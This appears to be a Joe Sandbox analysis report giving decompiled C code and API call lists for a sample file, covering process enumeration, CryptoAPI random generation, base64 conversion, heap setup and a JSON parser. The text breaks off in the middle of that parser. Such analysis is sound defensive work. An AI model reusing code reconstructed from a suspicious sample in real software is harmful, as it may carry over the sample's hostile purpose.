                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 75%
                                                                                                                                                            			E009C53A4(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                            				void* _v560;
                                                                                                                                                            				void* _t8;
                                                                                                                                                            				struct tagPROCESSENTRY32W* _t9;
                                                                                                                                                            				int _t19;
                                                                                                                                                            				void* _t20;
                                                                                                                                                            
                                                                                                                                                            				_t19 = 0;
                                                                                                                                                            				_t8 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                                                                            				_t20 = _t8;
                                                                                                                                                            				if(_t20 != 0xffffffff) {
                                                                                                                                                            					_t9 =  &_v560;
                                                                                                                                                            					_v560 = 0x22c;
                                                                                                                                                            					Process32FirstW(_t20, _t9); // executed
                                                                                                                                                            					while(_t9 != 0) {
                                                                                                                                                            						_t19 = _a12(_a8,  &_v560);
                                                                                                                                                            						if(_t19 == 0 || _a4 == 0) {
                                                                                                                                                            							_t9 = Process32NextW(_t20,  &_v560); // executed
                                                                                                                                                            							continue;
                                                                                                                                                            						} else {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					E009C4B21(_t20); // executed
                                                                                                                                                            					return _t19;
                                                                                                                                                            				}
                                                                                                                                                            				return 0;
                                                                                                                                                            			}









APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009C53B4
• Process32FirstW.KERNEL32(00000000,?), ref: 009C53D7
Memory Dump Source
• Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
• Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
• Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
• Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
Uniqueness Score: -1.00%

APIs
• CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 009C5CF7
  • Part of subcall function 009C47AB: HeapCreate.KERNEL32(00000000,00400000,00000000,?,009C1C60,?,?,009C150C), ref: 009C47C0
  • Part of subcall function 009C47AB: GetProcessHeap.KERNEL32(?,009C1C60,?,?,009C150C), ref: 009C47CF
• CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 009C5D1E
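Uniqueness Score: -1.00%

C-Code - Quality: 54%
E009C541B(void* __edx, int _a4, intOrPtr _a8) {
	BYTE* _v0;
	void* _t7;
	signed int _t11;
	void* _t14;

	// Returns 1 as soon as either helper (E009C5814, then E009C548C) reports success.
	_t7 = E009C5814(_a4, _a8); // executed
	if(_t7 == 0) {
		if(E009C548C(__edx, _a4, _a8) != 0) {
			goto L1;
		} else {
			// Fallback: fill the buffer via CryptoAPI.
			_pop(_t21); // decompiler artifact of a stack pop
			if( *0x9d1d38 != 0) { // provider handle already acquired
				L8:
				// CryptGenRandom(hProv, dwLen, pbBuffer)
				_t11 = CryptGenRandom( *0x9d1d34, _a4, _v0);
				asm("sbb eax, eax");
				return  ~( ~_t11);
			} else {
				// Per the API list for ref 009C565D this is CryptAcquireContextW with
				// dwProvType 1 (PROV_RSA_FULL) and dwFlags 0xF0000000 (CRYPT_VERIFYCONTEXT).
				_t14 =  *0x9d11e8(0x9d1d34, 0, 0, 1, 0xf0000000);
				if(_t14 != 0) {
					 *0x9d1d38 = 1; // cache: handle at 0x9d1d34 is valid
					goto L8;
				} else {
					return _t14;
				}
			}
		}
	} else {
		L1:
		return 1;
	}
}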








APIs
• CryptAcquireContextW.ADVAPI32(009D1D34,00000000,00000000,00000001,F0000000,?,009C6A64,?,00000030,00000000,?,?,009C67D8,?,00000020,00000000), ref: 009C565D
Uniqueness Score: -1.00%

APIs
• CryptBinaryToStringW.CRYPT32(00000000,00000000,40000000,00000000,009C18E3), ref: 009C5D60
  • Part of subcall function 009C47AB: HeapCreate.KERNEL32(00000000,00400000,00000000,?,009C1C60,?,?,009C150C), ref: 009C47C0
  • Part of subcall function 009C47AB: GetProcessHeap.KERNEL32(?,009C1C60,?,?,009C150C), ref: 009C47CF
• CryptBinaryToStringW.CRYPT32(00000000,00000000,40000000,00000000,009C18E3), ref: 009C5D89
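Uniqueness Score: -1.00%

C-Code - Quality: 100%
E009C47AB(intOrPtr _a4) {
	void* _t2;
	void* _t3;

	// Lazily set up the heap handle stored at 0x9d1d20; 0x9d1d24 is the "initialized" flag.
	if( *0x9d1d24 != 0) {
		_t2 =  *0x9d1d20; // 0x2a40000
	} else {
		// Private heap: flOptions 0, initial size 0x400000, maximum size 0.
		_t2 = HeapCreate(0, 0x400000, 0); // executed
		 *0x9d1d20 = _t2;
		if(_t2 == 0) {
			// HeapCreate failed: fall back to the default process heap.
			 *0x9d1d20 = GetProcessHeap();
		}
		 *0x9d1d24 = 1;
	}
	_t3 = E009C474E(_t2, _a4); // executed
	return _t3;
}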





                                                                                                                                                            APIs
                                                                                                                                                            • HeapCreate.KERNEL32(00000000,00400000,00000000,?,009C1C60,?,?,009C150C), ref: 009C47C0
                                                                                                                                                            • GetProcessHeap.KERNEL32(?,009C1C60,?,?,009C150C), ref: 009C47CF
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.596591491.00000000009C0000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596642777.00000000009CD000.00000002.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596664052.00000000009D0000.00000004.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596690812.00000000009D3000.00000008.00020000.sdmp
                                                                                                                                                            • Associated: 00000000.00000002.596720612.00000000009E0000.00000002.00020000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_9c0000_tS9P6wPz9x.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$CreateProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1042935442-0
                                                                                                                                                            • Opcode ID: 36d02a45e6861caf1b6aa045144615d315a988437f84389098a4df2c31145eb5
                                                                                                                                                            • Instruction ID: 681259254e3560684f3456a847b5f042a886eda417aae24f40041bc4c7724e3b
                                                                                                                                                            • Opcode Fuzzy Hash: 36d02a45e6861caf1b6aa045144615d315a988437f84389098a4df2c31145eb5
                                                                                                                                                            • Instruction Fuzzy Hash: C7E01276A9E308BFD7109F90EC15F543BD9B709794F10001BE514961E0D77594C0AA19
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 81%
                                                                                                                                                            			E009CB82A(void* __ecx, void* __eflags, void* _a4, signed char _a7, signed char* _a8, signed char _a11, signed int _a12, signed int _a15) {
                                                                                                                                                            				signed char _v5;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				intOrPtr* _v16;
                                                                                                                                                            				char _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				signed int _v44;
                                                                                                                                                            				signed long long _v48;
                                                                                                                                                            				signed int _v52;
                                                                                                                                                            				signed char* _v56;
                                                                                                                                                            				signed int _v60;
                                                                                                                                                            				signed int _v64;
                                                                                                                                                            				signed int _v68;
                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                            				signed char* _v76;
                                                                                                                                                            				char _v80;
                                                                                                                                                            				intOrPtr _v92;
                                                                                                                                                            				signed char _v100;
                                                                                                                                                            				void _v104;
                                                                                                                                                            				intOrPtr _v108;
                                                                                                                                                            				void* _v112;
                                                                                                                                                            				char _v116;
                                                                                                                                                            				signed int _t387;
                                                                                                                                                            				void* _t390;
                                                                                                                                                            				void* _t394;
                                                                                                                                                            				void* _t396;
                                                                                                                                                            				char _t397;
                                                                                                                                                            				void* _t399;
                                                                                                                                                            				void* _t400;
                                                                                                                                                            				void* _t401;
                                                                                                                                                            				void* _t402;
                                                                                                                                                            				intOrPtr _t405;
                                                                                                                                                            				intOrPtr _t410;
                                                                                                                                                            				intOrPtr _t411;
                                                                                                                                                            				void* _t419;
                                                                                                                                                            				void* _t424;
                                                                                                                                                            				void* _t431;
                                                                                                                                                            				void* _t440;
                                                                                                                                                            				void* _t447;
                                                                                                                                                            				void* _t452;
                                                                                                                                                            				signed char _t453;
                                                                                                                                                            				signed int _t454;
                                                                                                                                                            				void* _t456;
                                                                                                                                                            				void* _t457;
                                                                                                                                                            				void* _t458;
                                                                                                                                                            				signed char _t460;
                                                                                                                                                            				void* _t462;
                                                                                                                                                            				void* _t469;
                                                                                                                                                            				void* _t472;
                                                                                                                                                            				void* _t473;
                                                                                                                                                            				void* _t474;
                                                                                                                                                            				void* _t476;
                                                                                                                                                            				signed char _t481;
                                                                                                                                                            				signed int _t482;
                                                                                                                                                            				signed char _t483;
                                                                                                                                                            				signed char _t484;
                                                                                                                                                            				signed char _t519;
                                                                                                                                                            				signed int _t520;
                                                                                                                                                            				signed char _t521;
                                                                                                                                                            				void* _t527;
                                                                                                                                                            				void* _t528;
                                                                                                                                                            				void* _t529;
                                                                                                                                                            				void* _t531;
                                                                                                                                                            				void* _t533;
                                                                                                                                                            				signed int _t540;
                                                                                                                                                            				void* _t546;
                                                                                                                                                            				intOrPtr _t549;
                                                                                                                                                            				signed int _t554;
                                                                                                                                                            				void* _t561;
                                                                                                                                                            				intOrPtr _t562;
                                                                                                                                                            				signed char* _t567;
                                                                                                                                                            				char _t568;
                                                                                                                                                            				signed char* _t569;
                                                                                                                                                            				signed char* _t570;
                                                                                                                                                            				signed char* _t571;
                                                                                                                                                            				signed char* _t572;
                                                                                                                                                            				signed char* _t573;
                                                                                                                                                            				signed char* _t574;
                                                                                                                                                            				signed char* _t575;
                                                                                                                                                            				signed char* _t576;
                                                                                                                                                            				signed char* _t577;
                                                                                                                                                            				signed char* _t578;
                                                                                                                                                            				signed char* _t579;
                                                                                                                                                            				signed char* _t580;
                                                                                                                                                            				signed char* _t581;
                                                                                                                                                            				signed char* _t582;
                                                                                                                                                            				signed char* _t583;
                                                                                                                                                            				signed char* _t584;
                                                                                                                                                            				signed char* _t585;
                                                                                                                                                            				signed char* _t586;
                                                                                                                                                            				signed int _t588;
                                                                                                                                                            				char _t590;
                                                                                                                                                            				signed int _t594;
                                                                                                                                                            				void* _t596;
                                                                                                                                                            				signed int _t624;
                                                                                                                                                            				signed int _t642;
                                                                                                                                                            				signed int _t644;
                                                                                                                                                            				signed int _t648;
                                                                                                                                                            				signed int _t658;
                                                                                                                                                            				signed int _t664;
                                                                                                                                                            				signed int _t665;
                                                                                                                                                            				signed int _t666;
                                                                                                                                                            				intOrPtr _t667;
                                                                                                                                                            				void* _t669;
                                                                                                                                                            				void _t670;
                                                                                                                                                            				intOrPtr _t671;
                                                                                                                                                            				signed int _t674;
                                                                                                                                                            				signed int _t675;
                                                                                                                                                            				signed int _t676;
                                                                                                                                                            				signed int _t677;
                                                                                                                                                            				signed int _t683;
                                                                                                                                                            				void* _t689;
                                                                                                                                                            				void* _t690;
                                                                                                                                                            				signed long long* _t691;
                                                                                                                                                            				signed long long _t712;
                                                                                                                                                            				signed long long _t715;
                                                                                                                                                            
                                                                                                                                                            				_v36 = 0;
                                                                                                                                                            				E009C4832( &_v116, 0, 0x34);
                                                                                                                                                            				_t387 = _a12;
                                                                                                                                                            				_t690 = _t689 + 0xc;
                                                                                                                                                            				_v40 = 0;
                                                                                                                                                            				_v52 = 0;
                                                                                                                                                            				_v64 = 0;
                                                                                                                                                            				_v60 = 0;
                                                                                                                                                            				_t567 = _a8;
                                                                                                                                                            				_v56 = _t567;
                                                                                                                                                            				if(_t387 >= 3 &&  *_t567 == 0xef && _t567[1] == 0xbb && _t567[2] == 0xbf) {
                                                                                                                                                            					_t567 =  &(_t567[3]);
                                                                                                                                                            					_t387 = _t387 - 3;
                                                                                                                                                            					_v56 = _t567;
                                                                                                                                                            				}
                                                                                                                                                            				_t712 =  *0x9cfbf8;
                                                                                                                                                            				_v32 = _t387 + _t567;
                                                                                                                                                            				_t588 = 6;
                                                                                                                                                            				_t390 = memcpy( &_v104, _a4, _t588 << 2);
                                                                                                                                                            				_t691 = _t690 + 0xc;
                                                                                                                                                            				_v112 = _t390;
                                                                                                                                                            				_v112 = _v112 - 8;
                                                                                                                                                            				_v108 = _t390 - 8;
                                                                                                                                                            				_v80 = 1;
                                                                                                                                                            				while(1) {
                                                                                                                                                            					L6:
                                                                                                                                                            					_v24 = _v24 & 0x00000000;
                                                                                                                                                            					_t664 = 0;
                                                                                                                                                            					_v28 = _v28 & 0;
                                                                                                                                                            					_t669 = 0;
                                                                                                                                                            					_t642 = 8;
                                                                                                                                                            					_a12 = 0;
                                                                                                                                                            					_v16 = 0;
                                                                                                                                                            					_v20 = 0;
                                                                                                                                                            					_v12 = _t642;
                                                                                                                                                            					_v72 = 1;
                                                                                                                                                            					while(1) {
                                                                                                                                                            						_v76 = _t567;
                                                                                                                                                            						if(_t567 != _v32) {
                                                                                                                                                            							_t590 =  *_t567;
                                                                                                                                                            						} else {
                                                                                                                                                            							_t590 = 0;
                                                                                                                                                            						}
                                                                                                                                                            						L10:
                                                                                                                                                            						_a11 = _t590;
                                                                                                                                                            						if((_t642 & 0x00000020) == 0) {
                                                                                                                                                            							L71:
                                                                                                                                                            							if((_v100 & 0x00000001) == 0) {
                                                                                                                                                            								L100:
                                                                                                                                                            								if(_t642 >= 0) {
                                                                                                                                                            									if((_t642 & 0x00000008) == 0) {
                                                                                                                                                            										_t259 = _t669 + 4; // 0x4
                                                                                                                                                            										_t394 = _t259;
                                                                                                                                                            										_t670 =  *_t394;
                                                                                                                                                            										_a4 = _t394;
                                                                                                                                                            										if(_t670 == 1) {
                                                                                                                                                            											st0 = _t712;
                                                                                                                                                            											_t396 = _t590 - 9;
                                                                                                                                                            											if(_t396 == 0) {
                                                                                                                                                            												L240:
                                                                                                                                                            												_t669 = _v16;
                                                                                                                                                            												L241:
                                                                                                                                                            												_t397 = _v80;
                                                                                                                                                            												L242:
                                                                                                                                                            												_t712 =  *0x9cfbf8;
                                                                                                                                                            												_t567 =  &(_t567[1]);
                                                                                                                                                            												_v76 = _t567;
                                                                                                                                                            												if(_t567 != _v32) {
                                                                                                                                                            													_t590 =  *_t567;
                                                                                                                                                            												} else {
                                                                                                                                                            													_t590 = 0;
                                                                                                                                                            												}
                                                                                                                                                            												goto L10;
                                                                                                                                                            											}
                                                                                                                                                            											_t527 = _t396 - 1;
                                                                                                                                                            											if(_t527 == 0) {
                                                                                                                                                            												_v72 = _v72 + 1;
                                                                                                                                                            												_v68 = _v68 & 0x00000000;
                                                                                                                                                            												goto L240;
                                                                                                                                                            											}
                                                                                                                                                            											_t528 = _t527 - 3;
                                                                                                                                                            											if(_t528 == 0) {
                                                                                                                                                            												goto L240;
                                                                                                                                                            											}
                                                                                                                                                            											_t529 = _t528 - 0x13;
                                                                                                                                                            											if(_t529 == 0) {
                                                                                                                                                            												goto L240;
                                                                                                                                                            											}
                                                                                                                                                            											_t531 = _t529;
                                                                                                                                                            											if(_t531 == 0) {
                                                                                                                                                            												if((_t642 & 0x00000004) != 0) {
                                                                                                                                                            													L247:
                                                                                                                                                            													_t568 = _v80;
                                                                                                                                                            													_t405 =  !=  ? _v28 : _v36;
                                                                                                                                                            													if(_t405 == 0) {
                                                                                                                                                            														L249:
                                                                                                                                                            														if(_t568 == 0) {
                                                                                                                                                            															E009CC474( &_v104, _v28);
                                                                                                                                                            														}
                                                                                                                                                            														return 0;
                                                                                                                                                            													} else {
                                                                                                                                                            														goto L248;
                                                                                                                                                            													}
                                                                                                                                                            													do {
                                                                                                                                                            														L248:
                                                                                                                                                            														_t671 =  *((intOrPtr*)(_t405 + 0x10));
                                                                                                                                                            														_v92(_t405);
                                                                                                                                                            														_t405 = _t671;
                                                                                                                                                            													} while (_t671 != 0);
                                                                                                                                                            													goto L249;
                                                                                                                                                            												}
                                                                                                                                                            												_t669 = _v16;
                                                                                                                                                            												_t642 = _t642 | 0x00000020;
                                                                                                                                                            												_t664 = 0;
                                                                                                                                                            												_v12 = _t642;
                                                                                                                                                            												_a12 = 0;
                                                                                                                                                            												_v24 =  *((intOrPtr*)(_t669 + 0x10));
                                                                                                                                                            												L227:
                                                                                                                                                            												if((_t642 & 0x00000002) != 0) {
                                                                                                                                                            													_t642 = _t642 & 0xfffffffd;
                                                                                                                                                            													_t567 = _t567 - 1;
                                                                                                                                                            													_v12 = _t642;
                                                                                                                                                            													_v76 = _t567;
                                                                                                                                                            												}
                                                                                                                                                            												if((_t642 & 0x00000001) != 0) {
                                                                                                                                                            													_t410 =  *_t669;
                                                                                                                                                            													_t644 = _t642 & 0xfffffffe | 0x00000004;
                                                                                                                                                            													_t594 = _t644;
                                                                                                                                                            													if(_t410 != 0) {
                                                                                                                                                            														_t642 =  !=  ? _t594 : _t644 | 0x00000008;
                                                                                                                                                            														_v12 = _t642;
                                                                                                                                                            														if(_v80 == 0) {
                                                                                                                                                            															_t596 =  *((intOrPtr*)(_t410 + 4)) - 1;
                                                                                                                                                            															if(_t596 == 0) {
                                                                                                                                                            																 *((intOrPtr*)( *(_t410 + 8) * 0xc +  *((intOrPtr*)(_t410 + 0xc)) + 8)) = _t669;
                                                                                                                                                            															} else {
                                                                                                                                                            																if(_t596 == 1) {
                                                                                                                                                            																	 *((intOrPtr*)( *((intOrPtr*)(_t410 + 0xc)) +  *(_t410 + 8) * 4)) = _t669;
                                                                                                                                                            																}
                                                                                                                                                            															}
                                                                                                                                                            														}
                                                                                                                                                            														_t411 =  *_t669;
                                                                                                                                                            														 *((intOrPtr*)(_t411 + 8)) =  *((intOrPtr*)(_t411 + 8)) + 1;
                                                                                                                                                            														if( *((intOrPtr*)(_t411 + 8)) > _v112) {
                                                                                                                                                            															goto L247;
                                                                                                                                                            														} else {
                                                                                                                                                            															_t669 =  *_t669;
                                                                                                                                                            															_v16 = _t669;
                                                                                                                                                            															_v20 = _t669;
                                                                                                                                                            															goto L241;
                                                                                                                                                            														}
                                                                                                                                                            													}
                                                                                                                                                            													_t642 = _t644 | 0x00000080;
                                                                                                                                                            													L82:
                                                                                                                                                            													_v12 = _t642;
                                                                                                                                                            												}
                                                                                                                                                            												goto L241;
                                                                                                                                                            											}
                                                                                                                                                            											_t533 = _t531 - 0xa;
                                                                                                                                                            											if(_t533 == 0) {
                                                                                                                                                            												if((_t642 & 0x00000004) == 0) {
                                                                                                                                                            													goto L247;
                                                                                                                                                            												}
                                                                                                                                                            												_t642 = _t642 & 0xfffffffb;
                                                                                                                                                            												L220:
                                                                                                                                                            												_v12 = _t642;
                                                                                                                                                            												L226:
                                                                                                                                                            												_t669 = _v16;
                                                                                                                                                            												goto L227;
                                                                                                                                                            											}
                                                                                                                                                            											if(_t533 != 0x51) {
                                                                                                                                                            												goto L247;
                                                                                                                                                            											}
                                                                                                                                                            											_t642 = _t642 & 0xfffffffb | 0x00000001;
                                                                                                                                                            											goto L220;
                                                                                                                                                            										}
                                                                                                                                                            										_t261 = _t670 - 3; // -3
                                                                                                                                                            										if(_t261 > 1) {
                                                                                                                                                            											st0 = _t712;
                                                                                                                                                            											goto L226;
                                                                                                                                                            										}
                                                                                                                                                            										if(_t590 - 0x30 > 9) {
                                                                                                                                                            											if(_t590 == 0x2b || _t590 == 0x2d) {
                                                                                                                                                            												if((_t642 & 0x00000c00) != 0x400) {
                                                                                                                                                            													goto L194;
                                                                                                                                                            												}
                                                                                                                                                            												st0 = _t712;
                                                                                                                                                            												_t642 =  !=  ? _t642 | 0x00000800 : _t642 | 0x1800;
                                                                                                                                                            												_v12 = _t642;
                                                                                                                                                            												goto L240;
                                                                                                                                                            											} else {
                                                                                                                                                            												if(_t590 != 0x2e || _t670 != 3) {
                                                                                                                                                            													L194:
                                                                                                                                                            													if((_t642 & 0x00000400) != 0) {
                                                                                                                                                            														if(_v40 == 0) {
                                                                                                                                                            															L246:
                                                                                                                                                            															st0 = _t712;
                                                                                                                                                            															goto L247;
                                                                                                                                                            														}
                                                                                                                                                            														_t540 = _v52;
                                                                                                                                                            														_t601 =  ~_t540;
                                                                                                                                                            														_t541 =  !=  ?  ~_t540 : _t540;
                                                                                                                                                            														 *_t691 = _t712;
                                                                                                                                                            														E009CC4DA( !=  ?  ~_t540 : _t540,  ~_t540, _t642 & 0x00001000,  ~_t540, _t601,  !=  ?  ~_t540 : _t540);
                                                                                                                                                            														_t669 = _v16;
                                                                                                                                                            														_t691 =  &(_t691[1]);
                                                                                                                                                            														_t642 = _v12;
                                                                                                                                                            														 *(_t669 + 8) = _t712 *  *(_t669 + 8);
                                                                                                                                                            														L206:
                                                                                                                                                            														if((_t642 & 0x00000100) != 0) {
                                                                                                                                                            															if( *_a4 != 3) {
                                                                                                                                                            																asm("fchs");
                                                                                                                                                            															} else {
                                                                                                                                                            																 *(_t669 + 8) =  ~( *(_t669 + 8));
                                                                                                                                                            																asm("adc eax, 0x0");
                                                                                                                                                            																 *(_t669 + 0xc) =  ~( *(_t669 + 0xc));
                                                                                                                                                            															}
                                                                                                                                                            														}
                                                                                                                                                            														_t642 = _t642 | 0x00000003;
                                                                                                                                                            														L211:
                                                                                                                                                            														_v12 = _t642;
                                                                                                                                                            														goto L227;
                                                                                                                                                            													}
                                                                                                                                                            													if(_t670 != 4) {
                                                                                                                                                            														_t669 = _v16;
                                                                                                                                                            														st0 = _t712;
                                                                                                                                                            														L199:
                                                                                                                                                            														if(_t590 == 0x65 || _t590 == 0x45) {
                                                                                                                                                            															_t546 = _a4;
                                                                                                                                                            															_t648 = _t642 | 0x00000400;
                                                                                                                                                            															if( *_t546 == 3) {
                                                                                                                                                            																 *_t546 = 4;
                                                                                                                                                            																asm("fild qword [esi+0x8]");
                                                                                                                                                            																 *(_t669 + 8) = _t712;
                                                                                                                                                            															}
                                                                                                                                                            															_v40 = _v40 & 0x00000000;
                                                                                                                                                            															_t642 = _t648 & 0xfffffdff;
                                                                                                                                                            															goto L82;
                                                                                                                                                            														} else {
                                                                                                                                                            															goto L206;
                                                                                                                                                            														}
                                                                                                                                                            													}
                                                                                                                                                            													_t547 = _v40;
                                                                                                                                                            													if(_v40 == 0) {
                                                                                                                                                            														goto L246;
                                                                                                                                                            													}
                                                                                                                                                            													asm("fild qword [ebp-0x3c]");
                                                                                                                                                            													_v48 = _t712;
                                                                                                                                                            													_t715 = _v48;
                                                                                                                                                            													_v48 = _t715;
                                                                                                                                                            													 *_t691 = _t715;
                                                                                                                                                            													E009CC4DA(_t547, _t590, _t642, _t590, _t590, _t547);
                                                                                                                                                            													asm("fdivr qword [ebp-0x2c]");
                                                                                                                                                            													_t691 =  &(_t691[1]);
                                                                                                                                                            													_t549 = _v16;
                                                                                                                                                            													_t669 = _v20;
                                                                                                                                                            													_t567 = _v76;
                                                                                                                                                            													_t642 = _v12;
                                                                                                                                                            													_t590 = _a11;
                                                                                                                                                            													_v16 = _t669;
                                                                                                                                                            													_t712 = _t715 +  *(_t549 + 8);
                                                                                                                                                            													 *(_t549 + 8) = _t712;
                                                                                                                                                            													goto L199;
                                                                                                                                                            												} else {
                                                                                                                                                            													st0 = _t712;
                                                                                                                                                            													if(_v40 == 0) {
                                                                                                                                                            														goto L247;
                                                                                                                                                            													}
                                                                                                                                                            													_t669 = _v16;
                                                                                                                                                            													_v40 = _v40 & 0x00000000;
                                                                                                                                                            													 *_a4 = 4;
                                                                                                                                                            													asm("fild qword [esi+0x8]");
                                                                                                                                                            													 *(_t669 + 8) = _t712;
                                                                                                                                                            													goto L241;
                                                                                                                                                            												}
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            										st0 = _t712;
                                                                                                                                                            										_t554 = _v40 + 1;
                                                                                                                                                            										_v40 = _t554;
                                                                                                                                                            										if(_t670 == 3) {
                                                                                                                                                            											if((_t642 & 0x00000400) != 0) {
                                                                                                                                                            												L185:
                                                                                                                                                            												_t642 = _t642 | 0x00000800;
                                                                                                                                                            												_v12 = _t642;
                                                                                                                                                            												_v52 = _a11 + 0xffffffd0 + _v52 * 0xa;
                                                                                                                                                            												goto L240;
                                                                                                                                                            											}
                                                                                                                                                            											if((0x00000200 & _t642) != 0) {
                                                                                                                                                            												goto L247;
                                                                                                                                                            											}
                                                                                                                                                            											if(_t554 == 1 && _t590 == 0x30) {
                                                                                                                                                            												_t642 = _t642 | 0x00000200;
                                                                                                                                                            												_v12 = _t642;
                                                                                                                                                            											}
                                                                                                                                                            											asm("cdq");
                                                                                                                                                            											_t665 = _t642;
                                                                                                                                                            											_t561 = E009CC6F0( *((intOrPtr*)(_v16 + 8)),  *((intOrPtr*)(_v16 + 0xc)), 0xa, 0);
                                                                                                                                                            											_t562 = _v16;
                                                                                                                                                            											asm("adc edi, edx");
                                                                                                                                                            											_t642 = _v12;
                                                                                                                                                            											 *((intOrPtr*)(_t562 + 8)) = _t590 - 0x30 + _t561;
                                                                                                                                                            											_t669 = _t562;
                                                                                                                                                            											 *(_t669 + 0xc) = _t665;
                                                                                                                                                            											_t664 = _a12;
                                                                                                                                                            											goto L241;
                                                                                                                                                            										}
                                                                                                                                                            										if((_t642 & 0x00000400) != 0) {
                                                                                                                                                            											goto L185;
                                                                                                                                                            										}
                                                                                                                                                            										asm("cdq");
                                                                                                                                                            										_t666 = _t642;
                                                                                                                                                            										_v64 = _t590 - 0x30 + E009CC6F0(_v64, _v60, 0xa, 0);
                                                                                                                                                            										asm("adc edi, edx");
                                                                                                                                                            										_t642 = _v12;
                                                                                                                                                            										_v60 = _t666;
                                                                                                                                                            										_t664 = _a12;
                                                                                                                                                            										goto L240;
                                                                                                                                                            									}
                                                                                                                                                            									st0 = _t712;
                                                                                                                                                            									_t399 = _t590 - 9;
                                                                                                                                                            									if(_t399 == 0) {
                                                                                                                                                            										goto L241;
                                                                                                                                                            									}
                                                                                                                                                            									_t400 = _t399 - 1;
                                                                                                                                                            									if(_t400 == 0) {
                                                                                                                                                            										L107:
                                                                                                                                                            										_v72 = _v72 + 1;
                                                                                                                                                            										_v68 = _v68 & 0x00000000;
                                                                                                                                                            										goto L241;
                                                                                                                                                            									}
                                                                                                                                                            									_t401 = _t400 - 3;
                                                                                                                                                            									if(_t401 == 0) {
                                                                                                                                                            										goto L241;
                                                                                                                                                            									}
                                                                                                                                                            									_t402 = _t401 - 0x13;
                                                                                                                                                            									if(_t402 == 0) {
                                                                                                                                                            										goto L241;
                                                                                                                                                            									}
                                                                                                                                                            									if(_t402 == 0x3d) {
                                                                                                                                                            										if(_t669 == 0 ||  *((intOrPtr*)(_t669 + 4)) != 2) {
                                                                                                                                                            											goto L247;
                                                                                                                                                            										} else {
                                                                                                                                                            											_t642 = _t642 & 0xfffffff3 | 0x00000001;
                                                                                                                                                            											goto L211;
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            									if((_t642 & 0x00000004) == 0) {
                                                                                                                                                            										if((_t642 & 0x00000040) == 0) {
                                                                                                                                                            											_v12 = _t642 & 0xfffffff7;
                                                                                                                                                            											if(_t590 == 0x22) {
                                                                                                                                                            												_t419 = E009CC51F( &_v116,  &_v20,  &_v28,  &_v36, 5); // executed
                                                                                                                                                            												_t691 =  &(_t691[2]);
                                                                                                                                                            												if(_t419 == 0) {
                                                                                                                                                            													goto L247;
                                                                                                                                                            												}
                                                                                                                                                            												_t669 = _v20;
                                                                                                                                                            												_t567 = _v76;
                                                                                                                                                            												_t642 = _v12 | 0x00000020;
                                                                                                                                                            												_t664 = 0;
                                                                                                                                                            												_v12 = _t642;
                                                                                                                                                            												_v16 = _t669;
                                                                                                                                                            												_v24 =  *(_t669 + 0xc);
                                                                                                                                                            												_a12 = 0;
                                                                                                                                                            												goto L241;
                                                                                                                                                            											}
                                                                                                                                                            											if(_t590 == 0x5b) { /* '[' */
                                                                                                                                                            												_t424 = E009CC51F( &_v116,  &_v20,  &_v28,  &_v36, 2);
                                                                                                                                                            												_t691 =  &(_t691[2]);
                                                                                                                                                            												if(_t424 == 0) {
                                                                                                                                                            													goto L247;
                                                                                                                                                            												}
                                                                                                                                                            												_t669 = _v20;
                                                                                                                                                            												_t642 = _v12 | 0x00000008;
                                                                                                                                                            												_t567 = _v76;
                                                                                                                                                            												_v12 = _t642;
                                                                                                                                                            												_v16 = _t669;
                                                                                                                                                            												goto L241;
                                                                                                                                                            											}
                                                                                                                                                            											if(_t590 == 0x66) {
                                                                                                                                                            												if(_v32 - _t567 < 4) {
                                                                                                                                                            													goto L247;
                                                                                                                                                            												}
                                                                                                                                                            												_t569 =  &(_t567[1]);
                                                                                                                                                            												_v76 = _t569;
                                                                                                                                                            												if( *_t569 != 0x61) {
                                                                                                                                                            													goto L247;
                                                                                                                                                            												}
                                                                                                                                                            												_t570 =  &(_t569[1]);
                                                                                                                                                            												_v76 = _t570;
                                                                                                                                                            												if( *_t570 != 0x6c) {
                                                                                                                                                            													goto L247;
                                                                                                                                                            												}
                                                                                                                                                            												_t571 =  &(_t570[1]);
                                                                                                                                                            												_v76 = _t571;
                                                                                                                                                            												if( *_t571 != 0x73) {
                                                                                                                                                            													goto L247;
                                                                                                                                                            												}
                                                                                                                                                            												_t572 =  &(_t571[1]);
